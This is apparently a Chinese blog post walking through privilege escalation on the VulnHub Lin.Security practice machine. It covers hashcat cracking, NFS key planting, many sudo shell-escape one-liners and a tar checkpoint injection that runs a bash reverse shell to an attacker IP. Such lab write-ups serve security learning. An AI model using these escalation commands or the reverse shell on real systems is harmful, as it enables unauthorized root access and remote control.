[vulnhub]Lin.Security主机Linux提权

2024-06-09 21:04
文章标签 linux 主机 security vulnhub 提权 lin

本文主要是介绍[vulnhub]Lin.Security主机Linux提权,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Hash Crack(Hash cat)

bob@linsecurity:~$ cat /etc/passwd

image-2.png

$ echo "AzER3pBZh6WZE">hash

检查哈希类型:

$ hash-identifier AzER3pBZh6WZE

image-3.png

$ hashcat -m 1500 -a 0 hash /usr/share/wordlists/rockyou.txt --force

image-4.png

username:insecurity
password:AzER3pBZh6WZE:P@ssw0rd

image-5.png

NFS

$ showmount -e 192.168.8.104

Export list for 192.168.8.104:
/home/peter *

挂载到peter

获取关于peter的信息

image-6.png

peter的UDI是1001

$ sudo mkdir /mnt/lin_peter
$ sudo adduser -u 1001 peter

创建用户peter.

image-7.png

$ sudo mount 192.168.8.104:/home/peter /mnt/lin_peter -o vers=3

$ sudo ls /mnt/lin_peter -la

$ su peter

(peter)$ ssh-keygen -t ssh-rsa
(peter)$ mkdir /mnt/lin_peter/.ssh/
(peter)$ cp ~/.ssh/id_rsa.pub /mnt/lin_peter/.ssh/authorized_keys

image-8.png

(peter)$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i ~/.ssh/id_rsa peter@192.168.8.104

image-9.png

Root

修改NFS的共享文件夹

peter@linsecurity:~$ cat /etc/exports

image-10.png

image-11.png

发现关于strace权限提升

image-12.png.

$ sudo strace -o /dev/null /bin/sh

image-13.png

Sudo

bob@linsecurity:~$ sudo -l

image-15.png

Matching Defaults entries for bob on linsecurity:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser bob may run the following commands on linsecurity:(ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less,/usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh,/usr/bin/git, /usr/bin/script, /usr/bin/scp

ash

ash(Almquist Shell)是一个轻量级、高效的 Unix/Linux 命令行解释器,常用于嵌入式系统和资源受限的环境中。

$ sudo ash

awk

awk 是一个用于在 Unix/Linux 系统中进行模式匹配和文本处理的强大工具和编程语言。

sudo awk 'BEGIN {system("/bin/sh")}'

bash

bash 是一个广泛使用的 Unix/Linux 命令行解释器和脚本语言,提供强大的交互和自动化功能。

sudo /bin/bash

csh

csh 是一种基于 C 语言语法的 Unix 命令行解释器,提供丰富的编程功能和用户交互特性。

sudo csh

dash

dash 是一个轻量级且符合 POSIX 标准的 Unix/Linux 命令行解释器,专为快速执行脚本而设计。

sudo dash

ed

ed是一个基于命令行的行编辑器,用于在Unix和类Unix系统中进行基本的文本编辑操作。

sudo ed
!/bin/sh

env

env是一个用于显示或设置环境变量的命令行工具,在Unix和类Unix系统中被广泛使用。

sudo env /bin/sh

expect

expect是一种用于编写和执行交互式脚本的自动化工具,常用于模拟人类用户与命令行程序或脚本的交互过程。

sudo expect -c 'spawn /bin/sh;interact'

find

find是一个用于在文件系统中搜索文件和目录的命令行工具,支持多种搜索条件和操作。

sudo find . -exec /bin/sh \; -quit

ftp

ftp是一种用于在计算机之间传输文件的标准网络协议和命令行工具,支持文件传输、目录操作、权限设置等功能。

sudo ftp
!/bin/sh

less

less是一个命令行文本查看器,用于分页显示文本文件内容,并支持搜索、导航等功能,适用于查看大型文本文件。

sudo less /etc/profile
!/bin/sh

git

git是一个分布式版本控制系统,用于跟踪文件的更改并协调多人协作开发项目,提供了版本控制、分支管理、远程仓库等功能。

A

这会调用默认的分页器,通常是less,其他功能可能也适用。

sudo git -p help config
!/bin/sh

B

帮助系统也可以从任何 git 命令中访问,例如 git branch。这会调用默认的分页器,通常是 less,其他功能可能也适用。

sudo git branch --help config
!/bin/sh

C

Git钩子仅仅是shell脚本,在下面的示例中,使用了与预提交动作相关联的钩子。任何其他的钩子也可以工作,只需确保能够执行适当的操作来触发它。现有的存储库也可以使用,并且进入该目录也可以,即,可以不使用 -C 选项。

TF=$(mktemp -d)
ln -s /bin/sh "$TF/git-x"
sudo git "--exec-path=$TF" x

man

man是一个命令行工具,用于查看Unix和类Unix系统中命令、函数和配置文件等的详细手册页,提供了丰富的帮助信息和文档阅读功能。

sudo man man
!/bin/sh

more

more是一个命令行工具,用于逐页显示文本文件内容,支持基本的浏览和搜索操作,适用于查看较小的文本文件。

TERM= sudo more /etc/profile
!/bin/sh

scp

scp是基于SSH协议的文件传输工具,用于在Unix和类Unix系统之间安全地传输文件,支持加密传输、远程复制、文件权限保持等功能。

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

socat

socat是一个用于在Unix系统中建立双向数据流连接的网络工具,支持各种类
型的连接、数据传输、代理功能等。

sudo socat stdin exec:/bin/sh

ssh

ssh是一种安全的远程登录和数据传输协议,提供了加密通信、身份验证、端口转发等功能,用于在计算机之间建立安全的连接和传输数据。

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

vi

vi是一款在Unix和类Unix系统中常用的文本编辑器,具有模式切换、编辑操作、命令执行等功能,适用于在终端环境下进行文本编辑。

sudo vi -c ':!/bin/sh' /dev/null

zsh

zsh是一种功能强大的命令行解释器,具有丰富的特性和高度的可定制性,提供了智能补全、历史命令管理、多种主题样式等功能,适用于提高命令行操作效率和舒适度。

sudo zsh

pico

pico是一个简单易用的文本编辑器,提供了基本的编辑功能,适用于在终端环境下进行简单的文本编辑任务。

sudo pico
^R^X
reset; sh 1>&0 2>&0

rvim

rvim可能是Vim编辑器的简化版本,提供了简化的功能和基本的编辑功能,适用于初学者或需要快速编辑文件的场景。

A

This requires that rvim is compiled with Python support. Prepend :py3 for Python 3.

sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

B

This requires that rvim is compiled with Lua support.

sudo rvim -c ':lua os.execute("reset; exec sh")'

perl

Perl是一种通用的脚本编程语言,具有强大的文本处理能力和广泛的应用领域,适用于各种编程任务和场景。

sudo perl -e 'exec "/bin/sh";'

tclsh

tclsh是Tcl的解释器,提供了一个交互式的环境,用于执行Tcl语句和脚本。

sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

script

script命令用于记录和保存当前终端会话的所有输入和输出内容到一个文件中。

sudo script -q /dev/null

crontab

查看机器定时任务

image-18.png

image-19.png

在目录/home/bob创建文件,进行命令参数注入

image-20.png

$ echo "" > --checkpoint=1
$ echo '/bin/bash -i >& /dev/tcp/192.168.8.103/10032 0>&1'>reverse.sh
$ chmod +x reverse.sh
echo "" > "--checkpoint-action=exec=sh reverse.sh"

等待几分钟即可获得反向shell

这篇关于[vulnhub]Lin.Security主机Linux提权的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/1046294

相关文章

Linux内核的调试(TODO)

Linux内核的调试(TODO)

(TODO)
阅读更多...
Spring Security 基于表达式的权限控制

Spring Security 基于表达式的权限控制

前言 spring security 3.0已经可以使用spring el表达式来控制授权,允许在表达式中使用复杂的布尔逻辑来控制访问的权限。 常见的表达式 Spring Security可用表达式对象的基类是SecurityExpressionRoot。 表达式描述hasRole([role])用户拥有制定的角色时返回true (Spring security默认会带有ROLE_前缀),去
阅读更多...
Security OAuth2 单点登录流程

Security OAuth2 单点登录流程

单点登录(英语:Single sign-on,缩写为 SSO),又译为单一签入,一种对于许多相互关连,但是又是各自独立的软件系统,提供访问控制的属性。当拥有这项属性时,当用户登录时,就可以获取所有系统的访问权限,不用对每个单一系统都逐一登录。这项功能通常是以轻型目录访问协议(LDAP)来实现,在服务器上会将用户信息存储到LDAP数据库中。相同的,单一注销(single sign-off)就是指
阅读更多...
浅析Spring Security认证过程

浅析Spring Security认证过程

类图 为了方便理解Spring Security认证流程,特意画了如下的类图,包含相关的核心认证类 概述 核心验证器 AuthenticationManager 该对象提供了认证方法的入口,接收一个Authentiaton对象作为参数; public interface AuthenticationManager {Authentication authenticate(Authenti
阅读更多...
Spring Security--Architecture Overview

Spring Security--Architecture Overview

1 核心组件 这一节主要介绍一些在Spring Security中常见且核心的Java类,它们之间的依赖,构建起了整个框架。想要理解整个架构,最起码得对这些类眼熟。 1.1 SecurityContextHolder SecurityContextHolder用于存储安全上下文(security context)的信息。当前操作的用户是谁,该用户是否已经被认证,他拥有哪些角色权限…这些都被保
阅读更多...
Spring Security基于数据库验证流程详解

Spring Security基于数据库验证流程详解

Spring Security 校验流程图 相关解释说明(认真看哦) AbstractAuthenticationProcessingFilter 抽象类 /*** 调用 #requiresAuthentication(HttpServletRequest, HttpServletResponse) 决定是否需要进行验证操作。* 如果需要验证,则会调用 #attemptAuthentica
阅读更多...
Spring Security 从入门到进阶系列教程

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin
阅读更多...
linux-基础知识3

linux-基础知识3

打包和压缩 zip 安装zip软件包 yum -y install zip unzip 压缩打包命令: zip -q -r -d -u 压缩包文件名 目录和文件名列表 -q:不显示命令执行过程-r:递归处理,打包各级子目录和文件-u:把文件增加/替换到压缩包中-d:从压缩包中删除指定的文件 解压:unzip 压缩包名 打包文件 把压缩包从服务器下载到本地 把压缩包上传到服务器(zip
阅读更多...
Linux 网络编程 --- 应用层

Linux 网络编程 --- 应用层

一、自定义协议和序列化反序列化 代码: 序列化反序列化实现网络版本计算器 二、HTTP协议 1、谈两个简单的预备知识 https://www.baidu.com/ --- 域名 --- 域名解析 --- IP地址 http的端口号为80端口,https的端口号为443 url为统一资源定位符。CSDNhttps://mp.csdn.net/mp_blog/creation/editor
阅读更多...
【Python编程】Linux创建虚拟环境并配置与notebook相连接

【Python编程】Linux创建虚拟环境并配置与notebook相连接

1.创建 使用 venv 创建虚拟环境。例如,在当前目录下创建一个名为 myenv 的虚拟环境: python3 -m venv myenv 2.激活 激活虚拟环境使其成为当前终端会话的活动环境。运行: source myenv/bin/activate 3.与notebook连接 在虚拟环境中,使用 pip 安装 Jupyter 和 ipykernel: pip instal
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2